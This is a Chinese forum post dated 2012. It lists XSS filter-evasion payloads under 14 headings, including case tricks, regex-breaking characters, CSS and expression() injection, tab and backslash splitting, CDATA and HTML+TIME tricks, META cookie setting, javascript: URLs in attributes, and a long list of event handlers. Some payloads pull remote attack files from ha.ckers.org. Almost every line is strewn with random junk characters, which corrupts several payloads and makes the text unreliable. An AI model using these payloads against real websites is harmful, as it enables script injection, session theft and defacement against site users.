1. 改变字符大小写0 p& E) M+ E; o' h
4 M; |* g+ j7 M- s" \% E3 x& p# o& P+ E
5 {" t2 a3 f3 g8 Z% M+ T& e
. Q& v) I F2 ^& [" I' P <sCript>alert(‘d’)</scRipT>
* {/ S3 w5 T$ M) {
# s! c/ m3 P# s( H: q+ L6 g2. 利用多加一些其它字符来规避Regular Expression的检查1 O3 o5 [1 ~7 K& Z, Z4 a7 G
, X3 w; ?- I/ d, z6 C L" i& A# S4 m1 F <<script>alert(‘c’)//<</script># B( D3 z9 ]6 J* b1 C
5 Q* e, i6 _7 h+ K! ^8 {4 ~9 Z <SCRIPT a=">" SRC="t.js"></SCRIPT>, p6 X* D, S& |3 j6 B: a- `
; U0 [" C8 B, ?% l <SCRIPT =">" SRC="t.js"></SCRIPT>
9 |. u2 c3 x. k+ ~4 B! x( R
8 B, r# q2 ]3 H& \* \5 T- K, l$ J <SCRIPT a=">" ” SRC="t.js"></SCRIPT>5 h; H) S+ _) L; S" c3 ?- S! S
# N @" `8 E8 n" s1 w- P- n0 D
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
, E% d. o) K* w$ Z# u) K5 w) Z; s1 I9 Q& J
<SCRIPT a=`>` SRC="t.js"></SCRIPT>4 E! C2 l; E) j( s1 N3 n
& M9 W; g# x* [+ R4 T" m, ^3 m <SCRIPT a=">’>" SRC="t.js"></SCRIPT>3 G# ]9 E- Z$ I1 m% X. c
( ^# @0 |0 c$ ?: M4 O& R, q% `# L3. 以其它扩展名取代.js+ f/ K( d3 x7 r# t
. M8 |, ]4 f; t <script src="bad.jpg"></script>
) E1 G+ Q6 N0 s2 f, w
( m' v- A" A3 R, U. N' U4. 将Javascript写在CSS档里
3 o$ e; m/ ]9 o3 s2 t& t& \5 i) Z6 e+ C, ~$ z( H
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
( b. u; W* _% b0 t+ s3 K0 m7 c1 X
0 P$ C$ Q, C* J6 k- q( L example:
7 j; k% z6 ~( u! l4 T- G
' x5 m5 z& F1 [3 M$ D5 k body {( k, D0 I( W) l" n1 T3 U8 W
8 l) W6 c( ?; M( c background-image: url(‘javascript:alert("XSS");’)
. Y+ U# q% |3 S- d% S
- d5 f o: U$ O# }* @" ` }! B1 U" L" m1 A9 R, E0 K
0 D. u5 f! |1 D3 Z6 ^5 M5. 在script的tag里加入一些其它字符* s0 B. X, w& t
l; a* B W8 v J [7 P( ~ <SCRIPT/SRC="t.js"></SCRIPT>8 C+ ~$ E* K; o/ N* Y1 q0 [
: |, d/ e& q3 l5 c <SCRIPT/anyword SRC="t.js"></SCRIPT># g' F1 y8 ?3 Y. F
7 e% H7 O; N+ L4 }' M6. 使用tab或是new line来规避
; W5 w* H, L# `2 l, u0 r- Z" K4 q+ [9 L" Y( [2 }6 @
<img src="jav ascr ipt:alert(‘XSS3′)">! g, X; ~2 h3 U8 {; U/ Z
* f0 L' O9 V( e$ P1 }2 d <img src="jav ascr ipt:alert(‘XSS3′)">2 d/ _9 ^8 H" a {
* h& p$ n1 u% P3 k3 m s6 n <IMG SRC="jav ascript:alert(‘XSS’);">9 H2 h! T; `' y8 H! g0 Y& _
" X* t ~+ ?1 X# }/ Y -> tag1 A" j7 `* X i6 I: F% \7 B8 H" U# F
" a, L" c) E* w5 q5 b -> new line$ D+ h) @: g: X. V5 H* r* A
5 Q& p9 h6 k+ d4 C( U& O" p
7. 使用"\"来规避8 o, e1 ~! Q- x+ E4 w) u" A
+ H* c T, l% ]# K" ~( h <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
& }, ?3 R4 B7 s; j. K
2 K. a$ G5 `9 @$ D1 @! Z- x <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
1 ?9 o) `( L/ _! l2 w9 q8 v
0 |) k6 S7 u3 j3 u/ R; k <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
1 W$ n( `7 @2 T% M$ z
+ O" t: \" W2 C1 @ <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">6 J2 J+ h% T: M2 u
# Q, k) W* d! A# ~7 S) W
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
- N! Z2 a. A- y7 T, l( I' N' Z' j5 F8 o$ w
8. 使用Hex encode来规避(也可能会把";"拿掉)
0 R8 P( Z' v- q" X
/ e% G' |/ {* r! a$ T6 V <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">' H0 d \1 _+ c1 c) B8 ?- X
& ^ a; |, B4 d- E8 C7 L _ 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 G4 @: ?" |( K" }7 P1 r( j; t, K2 F2 {0 w% ?9 C1 f' e' z+ ?
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">: i2 ^) S* z2 M0 R2 H4 \1 W- l
. O' Z0 N4 k; B8 j. ~0 `: n
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
# g- |# C. a e. S" v: Y7 i* V2 c& Q4 n7 o
9. script in HTML tag1 C0 W7 c* _& S9 _* v. ?
& M5 E# N! g% Q. @3 F8 @4 l
<body onload=」alert(‘onload’)」>1 {% I& D p5 m+ d" c% c$ j/ L9 `
9 O! i+ f" w8 F8 P
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
5 d, Z2 S2 c$ x. h% K( s" Q1 g
& m6 n5 Y( k, U0 K' ?! J; m& H7 o10. 在swf里含有xss的code8 v+ N& _. ^3 V0 i3 p/ E) p
6 d; Z* N6 U9 r <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
7 i: [! y& a$ ~- L! G
0 F! P4 J% O" P8 T1 D, d5 x11. 利用CDATA将xss的code拆开,再组合起来。" V9 v% t7 ^- {3 I; U0 {
+ ~. \( z: Q. \3 f' }% q6 s
<XML ID=I><X><C>; s1 v9 M; ^7 I8 A D
; w$ J% d8 r, O/ G+ x1 ]
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>4 x& y$ j: l3 L( H( u
6 r$ c1 w$ P- z6 l8 C </C></X>
6 d- U1 g( V( I# ?4 l7 U$ y
2 `& l/ u$ O7 v( D </xml>* F% `; ]9 z( J+ _) n
, h4 q1 o" T$ E: F
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
. B3 c. c+ E6 p! X" P4 }5 n8 x: e0 f; {% K! H" g! F7 f6 `. ~
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
% c, ^7 G! a+ d/ C0 X* U
1 V6 u8 u4 ~ X& z6 W <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
' ? s* M# F' L: L
9 R; [+ @9 [0 A c1 T12. 利用HTML+TIME。) m ` \6 P+ k' L+ S: X% {9 G
: s+ l2 k6 f+ Q% ]9 K$ ~ <HTML><BODY>
( ~% t6 c8 ^7 m( A5 I) D4 \. _1 U/ M) r/ D* |8 N4 f" @8 }- h3 h
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
% w# V3 B3 x: q$ x$ J- h: h, D$ Z' i( b- ?: C2 ^
<?import namespace="t" implementation="#default#time2">0 J) ]' Q6 t) R4 b
9 [: P n0 X& Z. j, O* m/ C r
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
& s. b- I. R9 ^4 U% k3 q4 Z, Q; ?+ m, g2 P9 Z" B: _$ N( x
</BODY></HTML>% p: D: A" o! ]$ @
/ ]5 s* ^! O1 m/ `2 D
13. 透过META写入Cookie。1 u3 Z1 J, @9 _" H
. a$ m; d* ~( f; {
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">6 W3 i) V% i4 Z+ Z; @6 i" a
8 M! D) J) s6 A6 u5 Z6 o' K" V+ n14. javascript in src , href , url
& B( X3 I2 g& x) L$ G$ F$ L* i. ^( K2 S8 J7 a
<IFRAME SRC=javascript:alert(’13′)></IFRAME>% O$ X0 I) D: b; r2 J: S5 o" ]
( x6 e$ E# j+ b# n
<img src="javascript:alert(‘XSS3′)">4 a4 k) p7 d( R1 X2 T$ [9 {% M
: d8 x# J& I ^7 Y5 C+ Y- |<IMG DYNSRC="javascript:alert(‘XSS20′)">" U C! D }) H& _5 p5 }
) A) i* u) n+ v7 Y' W2 ]
<IMG LOWSRC="javascript:alert(‘XSS21′)"># f2 U; i/ E! a1 j
& C2 G' s7 n1 B ^4 t <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
+ @. J" A* x7 g: t2 g H) P& }6 {/ E6 x. I3 N$ {
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
9 H# w* I- m% I" @# Y% s: K! V W0 z3 M+ F1 F+ |. `
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
: _+ z! g: b. H. @; V5 G* C% E$ M0 i' I3 k$ h2 C& I2 {8 J
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
1 Q- |( Z; o7 R* C2 ^
5 `) g8 V4 ?( c" l! N- U' C <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
; b3 C5 |* _& E2 P1 f
9 W' t* J; @" k# ~0 F </STYLE><A CLASS=XSS></A>' y9 i2 U8 J) ^ O9 {; P
( ]2 p" F( O+ F4 q9 w& N4 ^4 e# `
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
" K$ }* J# q4 t) M
/ C$ U4 I9 @& Y& V7 X8 t0 ? |
发表于 2012-12-31 09:59:28
收藏
支持
反对